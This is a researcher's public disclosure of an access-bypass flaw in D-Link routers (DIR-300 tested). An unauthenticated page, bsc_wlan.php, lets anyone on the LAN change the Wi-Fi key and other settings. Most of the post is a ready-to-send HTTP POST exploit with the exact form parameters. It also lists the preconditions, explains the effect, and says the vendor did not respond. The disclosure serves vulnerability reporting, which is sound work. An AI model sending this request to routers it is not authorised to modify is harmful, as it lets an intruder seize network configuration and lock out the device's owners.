D-Link bsc_wlan.php Access Bypass

`Hello All,  
  
Here is another D-Link vulnerability where you can change the network Key  
(i.e., WEP, WPAx keys).  
  
Requirement:  
1. You need to have access to the internal network of that router. The two  
scenarios are mentioned below:  
  
Scenario A: You know the network/ WIFI key to connect to the WIFI network  
but you may not have administration privilege to the device. Office scenario  
Scenario B: You are on wired LAN and the device is also on the LAN, allowing  
users to use the WiFi feature/ service.  
  
  
===Exploit Code===  
POST http://192.168.0.1/bsc_wlan.php HTTP/1.1  
Host: 192.168.0.1  
User-Agent: Mozilla/5.0  
Accept: text/html,application/xhtml+xml,application/xml  
Accept-Charset: ISO-8859-1,utf-8  
Keep-Alive: 115  
Proxy-Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 320  
  
  
  
ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=  
khuljas%21ms%21m&f_radius_ip1=&f_radius_port1=&f_radius_secret1=  
=====End Exploit Code===  
  
*What it does*  
The php file in the request allows Internal network systems, i.e., in this  
case 192.168.0.0/24, to change the WiFi Key without any authorization. This  
will also allow you to change other parameters/ configuration settings of  
the device.  
  
Affected Products: DIR-300 (tested) and others  
  
*Greets:*  
Friends: Plash, Satyam, int2root  
Mentor who inspired me: n2n  
  
  
Cheers,  
Gaurav Saha  
  
  
  
P.S I have sent this bug to DLink but never received any response. Hence I  
am disclosing the bug to the PUBLIC.  
`